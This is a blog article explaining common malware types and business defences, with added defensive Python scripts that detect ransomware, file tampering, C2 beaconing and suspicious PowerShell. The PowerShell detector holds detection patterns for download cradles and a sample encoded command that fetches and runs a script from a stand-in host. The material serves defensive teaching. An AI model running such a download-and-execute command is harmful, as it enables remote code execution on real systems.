The Different Types of Malware

Regardless of how familiar you are with Information Security, you’ve probably come across the term ‘malware’ countless times. From accessing your business-critical resources and sensitive information to halting business operations and services, a malware infection can quickly become an organization’s worst nightmare come true.
 
As a business owner, you must be aware of the implications of different types of malware on your company’s bottom line, and what steps you can take to protect your company from future attacks. This article will walk you through the various types of malware, how to identify and prevent a malware attack, and how to mitigate the risks.
 
What is Malware?
 
Malware, a combination of the terms ‘malicious’ and ‘software,’ includes all malicious programs that intend to exploit computer devices or entire network infrastructures to extract victims’ data, disrupt business operations, or simply cause chaos. There’s no single technique that defines malware; any program that harms the computer or system owners and benefits the perpetrators is malware. 
 
Malware commonly exploits unpatched software vulnerabilities to compromise an endpoint device and gain a foothold in an organization’s internal network; just as often, it simply persuades a user to run it. 
 
It could be hidden in a malicious advertisement, a fake email or an illegitimate software installer. Cyber criminals often leverage social engineering tactics like phishing and spear-phishing to deliver sophisticated malware. From mining cryptocurrency to launching DDoS attacks against networks, there are countless ways in which malware can access and abuse victims’ computers and data.
 
Warning Signs of Malware Infection
 
How often have you ignored unusual system slowdowns or unexpected pop-up messages? 
Unfortunately, this could be your computer trying to give away the presence of malware. To stop a malware attack in its tracks, you must first be able to identify an infection. 
 
Here are some of the key signs that may indicate malware at work on your computer system:
 
• Your computer starts running slowly and takes forever to boot.
• Your computer screen freezes or the system crashes, displaying the ‘Blue Screen of Death’ (BSOD).
• Your web browser keeps redirecting you to unknown, suspicious websites. 
• Security warnings keep popping up, urging you to take immediate action or install a particular security product. 
• Many pop-up ads start appearing randomly.
 
All of these could be typical signs of malware. The more symptoms you see, the more likely it is that you’re dealing with an infected computer. 
 
But don’t rely solely on the list above. It is not unusual for a system or network to be infected with malware, such as spyware, that lingers for months with no visible symptoms while exfiltrating sensitive data. Detecting that kind of infection requires looking at behaviour (file, process and network activity) rather than waiting for symptoms, and we return to that below.
 
Common Types of Malware
 
Malware can be categorized based on how it behaves (adware, spyware and ransomware) or on how it propagates from one victim to another (viruses, worms and trojans). Computer worms are self-propagating; viruses attach to host files and spread when those files are copied or shared; trojans rely on a user to run them and do not spread on their own. 
 
Here are a few of the most common malware types that most people have heard of, and how they continue to wreak havoc across industries.
 
1. Adware  If you’re lucky, the only malware program you’ve come in contact with is adware, which attempts to expose the compromised end-user to unwanted, potentially malicious advertising. A common adware program might redirect a user’s browser searches to look-alike web pages that contain other product promotions. Statistics gathered between October and December 2019 by Avast’s Threat Lab experts show that adware was responsible for 72% of all mobile malware, and the remaining 28% consisted of banking trojans, fake apps, lockers, and downloaders.
 
2. Spyware  Spyware silently infects a computer, mobile device or tablet to collect keystrokes, gather sensitive data or study user behaviour, all while the victim remains unaware of the intrusion. Attackers may use a keylogger to capture payment details and login credentials, or a screen grabber to capture on-screen activity. A related category is the memory (RAM) scraper: point-of-sale (POS) malware that reads card data out of a terminal’s memory during the brief window in which it is held unencrypted. The most notorious example is BlackPOS, which was used in the 2013 Target breach that exposed around 40 million payment card records.
 
3. Ransomware  Ransomware is one of the most widespread cyber threats, accounting for at least 27% of malware incidents in Verizon’s 2020 Data Breach Investigations Report (DBIR). Ransomware gains access to a computer’s file system and executes a payload that encrypts the victim’s data; the attackers then demand a ransom, usually in cryptocurrency, in exchange for the decryption key. Classic ransomware leaves the data in place, merely unreadable, but many operators now also exfiltrate data before encrypting it and threaten to publish it if the ransom is not paid. WannaCry is well known for the panic it caused in May 2017, when it hit NHS trusts across England, delaying procedures and forcing ambulances to be diverted. It spread using EternalBlue, an exploit for an SMBv1 vulnerability that Microsoft had patched two months earlier (MS17-010); many organisations had simply not applied the patch. Because WannaCry’s payment mechanism could not reliably tie a payment to a specific victim, paying rarely resulted in recovery, and much of the data it encrypted was lost for good.
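Ransomware is easiest to stop while it is still encrypting the first few files, so endpoint tooling watches file activity for the pattern described above: one process rewriting many files in quick succession, writing data that looks like ciphertext, and renaming files to a ransom extension. The script below is an added example (not code from the article or from any product) that runs that logic over a constructed event stream; the event format, the extension watch-list and the thresholds are assumptions you would tune for your own environment.

```python
import math
import os
from collections import Counter, defaultdict, deque

# Constructed samples (not real ransomware output). A byte-uniform buffer mimics the
# flat histogram of ciphertext; repeated English text mimics an ordinary document.
CIPHERTEXT_LIKE = bytes(range(256)) * 4
PLAINTEXT_LIKE = b"Quarterly report: revenue grew 4% year on year. " * 20

RANSOM_EXTENSIONS = {".locked", ".encrypted", ".crypt", ".wncry"}  # assumed watch-list
ENTROPY_THRESHOLD = 7.5   # bits/byte; encrypted or compressed data sits near 8.0, documents well below
BURST_THRESHOLD = 5       # writes/renames by one process ...
BURST_WINDOW = 10.0       # ... within this many seconds


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input, 8.0 for a uniform byte distribution)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def detect_ransomware(events):
    """Scan an ordered stream of file events and return (pid, reason, detail) alerts.

    Each event is a dict: ts (seconds), pid, op ('write' or 'rename'), path,
    plus data (bytes) for writes or new_path for renames. In production these
    would come from a file-system minifilter, auditd or an EDR sensor (assumption).
    """
    alerts = []
    recent = defaultdict(deque)   # pid -> timestamps of its recent modifications
    burst_flagged = set()
    for ev in events:
        pid, ts = ev["pid"], ev["ts"]
        window = recent[pid]
        window.append(ts)
        while ts - window[0] > BURST_WINDOW:
            window.popleft()

        if ev["op"] == "rename":
            ext = os.path.splitext(ev["new_path"])[1].lower()
            if ext in RANSOM_EXTENSIONS:
                alerts.append((pid, "rename_to_ransom_extension", ev["new_path"]))
        elif ev["op"] == "write":
            h = shannon_entropy(ev["data"])
            if h >= ENTROPY_THRESHOLD:
                alerts.append((pid, "high_entropy_write", f"{ev['path']} ({h:.2f} bits/byte)"))

        # Fire the burst alert once per process, the first time its window fills.
        if len(window) >= BURST_THRESHOLD and pid not in burst_flagged:
            burst_flagged.add(pid)
            alerts.append((pid, "modification_burst", f"{len(window)} ops within {BURST_WINDOW:.0f}s"))
    return alerts


# Constructed event stream: pid 100 is a user saving one document; pid 4242 is an
# unknown process rewriting six spreadsheets with ciphertext and renaming them.
SAMPLE_EVENTS = [
    {"ts": 0.0, "pid": 100, "op": "write", "path": "C:/Users/ann/report.docx", "data": PLAINTEXT_LIKE},
]
for i in range(6):
    path = f"C:/Users/ann/doc{i}.xlsx"
    SAMPLE_EVENTS.append({"ts": 5.0 + i * 0.5, "pid": 4242, "op": "write", "path": path, "data": CIPHERTEXT_LIKE})
    SAMPLE_EVENTS.append({"ts": 5.1 + i * 0.5, "pid": 4242, "op": "rename", "path": path, "new_path": path + ".locked"})

if __name__ == "__main__":
    for alert in detect_ransomware(SAMPLE_EVENTS):
        print(alert)
```

Only the unknown process trips any rule. Backup agents and archivers also write high-entropy data in bursts, so in practice the entropy and burst signals are combined with process reputation and canary files before a response (killing the process, isolating the host) is automated.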
 
4. Computer Viruses  A virus is the most commonly known form of malware. It differs from other malware in its ability to attach to a host file and infect other files on the computer system. It is copied whenever the host file is copied, and once a user opens the file, the virus payload executes. Viruses can be highly destructive, overwriting critical data; CIH’s payload, for example, overwrote the start of the hard drive and attempted to flash the BIOS, leaving some machines unbootable. Email attachments are the top vector leading to virus infections. Computer viruses often use deception techniques and keep evolving to evade antivirus software. CIH (written by Chen Ing-hau) wrote itself into unused space inside the host file rather than appending to it, so the file size did not change and integrity checks that compare only file sizes missed the infection.
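The CIH point above is really a point about file integrity monitoring: a check that records only file sizes cannot see an infector that fills existing slack space, while a check that records a cryptographic hash sees any change at all. The following added example (my code, not the article’s) baselines a directory with both size and SHA-256, tampers with one file in a way that preserves its length, and shows which check notices. The host file and the in-place overwrite are constructed stand-ins, not a real virus.

```python
import hashlib
import pathlib
import tempfile


def sha256_of(path: pathlib.Path) -> str:
    """SHA-256 of a file, read in chunks so large binaries are not loaded whole into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: pathlib.Path) -> dict:
    """Record (size, sha256) for every regular file under root, keyed by relative path."""
    return {
        str(p.relative_to(root)): (p.stat().st_size, sha256_of(p))
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(root: pathlib.Path, baseline: dict) -> list:
    """Return (relative_path, finding) pairs for files that changed since the baseline."""
    findings = []
    current = build_baseline(root)
    for rel, (size, digest) in baseline.items():
        if rel not in current:
            findings.append((rel, "missing"))
        elif current[rel][0] != size:
            findings.append((rel, "size_changed"))
        elif current[rel][1] != digest:
            # Same length, different bytes: exactly what a size-only check cannot see.
            findings.append((rel, "content_changed_size_same"))
    for rel in sorted(current.keys() - baseline.keys()):
        findings.append((rel, "new_file"))
    return findings


def overwrite_in_place(path: pathlib.Path, offset: int, payload: bytes) -> None:
    """Constructed stand-in for a cavity infector: patch bytes inside the file, length unchanged."""
    with path.open("r+b") as f:
        f.seek(offset)
        f.write(payload)


def demo():
    """Baseline a directory, tamper with one file without changing its size, compare both ways."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        exe = root / "app.exe"
        # Constructed host file: 1 KiB of code-like bytes followed by 3 KiB of zero padding,
        # the kind of section slack CIH wrote itself into.
        exe.write_bytes(bytes(range(256)) * 4 + b"\x00" * 3072)
        (root / "readme.txt").write_text("unchanged file\n")

        baseline = build_baseline(root)
        overwrite_in_place(exe, 2048, b"\xeb\xfe")  # two bytes inside the padding

        size_only = [rel for rel, (size, _) in baseline.items()
                     if (root / rel).stat().st_size != size]
        return size_only, compare(root, baseline)


if __name__ == "__main__":
    size_only, hashed = demo()
    print("size-only check flagged:", size_only)
    print("hash-based check flagged:", hashed)
```

The size-only list comes back empty; the hash comparison reports `app.exe` as changed with its size intact. For the baseline to mean anything it has to be stored somewhere the malware cannot rewrite it (a signed manifest, a separate host or a read-only share), which is the same reason modern platforms use signed code rather than local hash lists.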
 
5. Computer Worms  A worm is similar to a computer virus, except that it is standalone software that does not rely on a host file or on a user to propagate. A worm is self-replicating and can spread quickly across networks, mailing itself to the victim’s contact list or attacking other devices on the same network directly. Network segmentation and host firewalls that block the services worms exploit (for example SMB on port 445, which WannaCry and NotPetya both abused) limit their spread; antimalware is still needed for worms that arrive as email attachments. NotPetya, which spread in June 2017, combined the EternalBlue exploit with credential theft and legitimate administration tools to move laterally, overwrote the master boot record and encrypted the master file table with no working recovery path, and crippled hospitals, shipping and logistics companies and pharmaceutical multinationals worldwide. It remains one of the fastest-spreading and most destructive worms on record.
 
6. Trojan Horse  A trojan horse is a malware program that presents itself as legitimate software and tricks users into downloading and executing it. Once run, it can harm the victim’s computer in several ways, including keylogging. Most commonly it installs a backdoor that gives remote access to unauthorized users, who can then steal data and control the system from behind the firewall. Trojans cannot self-replicate and are usually propagated through email attachments and internet downloads. The PlugX backdoor was used to compromise around 7.93 million customer records at the Japanese travel agency JTB Corp in July 2016, and it all started with a single employee opening a phishing email.
 
7. Botnets  A botnet is a network of internet-connected ‘zombie’ computers that execute coordinated actions after receiving commands from attacker-controlled command-and-control (C2) servers. Bot malware quietly infects a computer, which then becomes part of the botnet and typically checks in with its C2 server at regular intervals for instructions. Botnets are used to send spam and to launch distributed denial of service (DDoS) attacks, leveraging hundreds of thousands of compromised computers. Conficker, or Downadup, is a fast-propagating worm discovered in November 2008 that exploited the MS08-067 Windows vulnerability; over the years it infected millions of computers to build a botnet that could be used for phishing, identity theft and access into private networks.
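The regular C2 check-in is the botnet’s weak point from a defender’s perspective: a bot that sleeps for a fixed interval between connections produces inter-connection gaps far more uniform than any human or event-driven service. The added example below (mine, not from the article) reads a constructed NetFlow-style export, groups flows by (source, destination, port), and flags pairs whose gap variance is low. The log format, the documentation-range addresses and the thresholds are assumptions.

```python
import statistics
from collections import defaultdict

# Constructed flow records in a NetFlow/firewall-export style: epoch,src,dst,dst_port,bytes.
# 10.0.0.23 contacts 203.0.113.5 (a documentation-range address) every ~60 s with a tiny,
# constant payload; 10.0.0.7 browses 198.51.100.10 at irregular, human intervals.
SAMPLE_LOG = """\
# epoch,src_ip,dst_ip,dst_port,bytes
1700000000,10.0.0.23,203.0.113.5,443,312
1700000005,10.0.0.7,198.51.100.10,443,48211
1700000017,10.0.0.7,198.51.100.10,443,9120
1700000060,10.0.0.23,203.0.113.5,443,312
1700000121,10.0.0.23,203.0.113.5,443,312
1700000140,10.0.0.7,198.51.100.10,443,77034
1700000150,10.0.0.7,198.51.100.10,443,1201
1700000180,10.0.0.23,203.0.113.5,443,312
1700000240,10.0.0.23,203.0.113.5,443,312
1700000302,10.0.0.23,203.0.113.5,443,312
1700000360,10.0.0.23,203.0.113.5,443,312
1700000419,10.0.0.23,203.0.113.5,443,312
1700000600,10.0.0.7,198.51.100.10,443,5400
1700000610,10.0.0.7,198.51.100.10,443,66002
1700000900,10.0.0.7,198.51.100.10,443,3070
1700000905,10.0.0.7,203.0.113.9,80,1500
"""


def parse_flows(text):
    """Parse the CSV export into (ts, src, dst, port, bytes) tuples, skipping comments."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, port, nbytes = line.split(",")
        flows.append((float(ts), src, dst, int(port), int(nbytes)))
    return flows


def find_beacons(flows, min_connections=6, max_jitter_cv=0.15):
    """Flag (src, dst, port) tuples whose inter-connection gaps are suspiciously regular.

    Regularity is the coefficient of variation (stdev / mean) of the gaps: a human or an
    event-driven service lands well above 1, a sleep-loop beacon far below it.
    Both thresholds are assumptions to tune per environment.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port, _ in flows:
        by_pair[(src, dst, port)].append(ts)

    beacons = []
    for (src, dst, port), times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_jitter_cv:
            beacons.append({"src": src, "dst": dst, "port": port, "connections": len(times),
                            "period_s": round(mean, 1), "jitter_cv": round(cv, 3)})
    return beacons


if __name__ == "__main__":
    for beacon in find_beacons(parse_flows(SAMPLE_LOG)):
        print(beacon)
```

Only the 10.0.0.23 pair is reported, with a period of about 60 seconds. Software updaters, monitoring agents and NTP clients beacon too, so the hit list is a starting point for enrichment (destination reputation, process on the host) rather than an alert on its own, and C2 frameworks that add random jitter to the sleep push the CV up, which is why the window should cover hours rather than minutes.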
 
Less Common Types of Malware
 
In addition to the types discussed above, there are many other types of malware that are less common but equally destructive.
 
1. Rootkit  A rootkit is a collection of software tools that obtains administrative (root) privileges on an operating system and then uses them to hide its own presence and that of other malware, for example by hooking system calls so that its files, processes and network connections are not listed. The same privileges let it disable security software or tamper with browsing sessions so that the victim cannot reach antimalware vendors’ websites.
 
2. Fileless Malware  Fileless malware is malicious code that abuses legitimate programs and operating system tools already on the machine, such as PowerShell, WMI and macros, and runs in memory rather than from an executable written to disk. Because there is little or nothing on the file system to scan, traditional file-based antimalware often misses it; detection relies on logging and analysing what those tools are asked to do (command lines, script blocks, parent-child process relationships).
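Since fileless attacks leave their evidence in command lines rather than on disk, the practical control is to log process creation (Sysmon event 1 or Windows event 4688 with command-line auditing) and score each PowerShell launch for the indicators that rarely appear together in legitimate use: an encoded command, a download cradle, a hidden window, execution-policy bypass, and an Office application as the parent. The added example below (my code, not the article’s) does that over three constructed events and decodes the `-EncodedCommand` argument (base64 of UTF-16LE) so the rules can be applied to the hidden script as well. The event fields, patterns and alert threshold are assumptions.

```python
import base64
import re

# Assumed detection patterns, modelled on common PowerShell abuse; extend from your own telemetry.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b"), "encoded_command"),
    (re.compile(r"(?i)invoke-expression|\biex\b"), "invoke_expression"),
    (re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest"), "download_cradle"),
    (re.compile(r"(?i)(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b"), "executionpolicy_bypass"),
    (re.compile(r"(?i)(?:^|\s)-(?:w|windowstyle)\s+hidden\b"), "hidden_window"),
    (re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile)\b"), "no_profile"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
ALERT_THRESHOLD = 2   # a single indicator (e.g. -ExecutionPolicy Bypass in a deploy script) is common noise


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event):
    """Score one process-creation event (assumed fields: pid, parent, cmdline)."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    reasons = []
    # Apply every rule to the visible command line and to the decoded script, if any.
    for text in (cmdline, decoded or ""):
        for pattern, name in SUSPICIOUS_PATTERNS:
            if name not in reasons and pattern.search(text):
                reasons.append(name)
    if event["parent"].lower() in OFFICE_PARENTS:
        reasons.append("office_parent")
    return {"pid": event["pid"], "reasons": reasons, "decoded": decoded,
            "suspicious": len(reasons) >= ALERT_THRESHOLD}


# Constructed events. The encoded payload is built here from a harmless documentation-range
# URL so that the sample decodes; it is not a real attacker command.
PAYLOAD_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD_TEXT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"pid": 1201, "parent": "explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"pid": 1345, "parent": "cmd.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\tools\deploy.ps1"},
    {"pid": 1502, "parent": "WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyse(ev))
```

The backup script scores nothing, the deployment script scores one indicator and stays below the threshold, and the Word-spawned encoded command scores on both the visible flags and the decoded download cradle. Command-line matching is cheap to evade (string splitting, aliases, obfuscation), so in production this is paired with PowerShell script block logging (event 4104), which records the de-obfuscated code as the engine actually runs it.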
 
3. Scareware  Scareware is a scam in which attackers trick victims into believing that their computers or mobile devices have been compromised. It typically displays alarming pop-ups on web pages to frighten the user into purchasing and installing fake, potentially harmful, ‘security’ software.

Today, attackers often combine several of these types in one campaign. A worm, for instance, can self-replicate across a network and deliver a payload that encrypts file systems on every machine it reaches, turning a single infection into a network-wide ransomware incident. These hybrid forms of malware are harder to detect, contain and remove than any single type.
 
How to Protect Your Business From Malware
 
The threat landscape is ever-evolving, and so are the security mechanisms. With malware becoming more sophisticated than ever, businesses must stay ahead of the cybersecurity game by ensuring that:
 
 
• All business applications and operating systems are always up-to-date, and available patches for known software vulnerabilities are installed.
• Antimalware scans are run regularly across all devices that access the internal network. 
• Employees only install apps and software that they actually need from legitimate sources. 
• Mobile devices that access the private network are also well-equipped with mobile security solutions.
• Multi-factor Authentication (MFA) is enforced so that a password captured by a keylogger is not enough on its own, and Single Sign-on (SSO) reduces the number of passwords users have to type. 
• In flexible working or bring-your-own-device (BYOD) environments, work and personal use are kept on separate devices, or at least work data is isolated on managed, encrypted devices.
• Employees are aware of the cybersecurity best practices, and regular security awareness workshops are conducted. 
• Employees are knowledgeable enough to spot a phishing email and double-check before providing sensitive information. 
• Your organization has invested in Security Information and Event Management (SIEM) software to aggregate and analyze event logs generated by network devices, endpoints and applications.
• If you work with an MSP (Managed Service Provider), make sure they are also a managed IT security provider. Certain credentials and audit reports help you judge whether they can provide a high level of security, including but not limited to:
  – Certified Information Systems Security Professional (CISSP) staff
  – An AICPA Service Organization Control (SOC 2) attestation report
  – MSP Alliance Cyber Verify AAA rating
 
How to Get Rid of Malware
 
No single security product is enough against malware that morphs and evolves rapidly to avoid detection. With today’s sprawling endpoint estates and huge attack surface, security incidents are inevitable. A reputable enterprise antimalware or EDR product can detect installed malware, quarantine the infected device to stop it spreading, and remove the malware. But preventing an infection is far easier than getting rid of one that has already infiltrated your IT infrastructure, so the best course of action is a proactive approach to cybersecurity: patch, restrict what can run, log what does, and rehearse the response. 
 
Ashley Lukeheart is Co-founder Parachute Technology 
 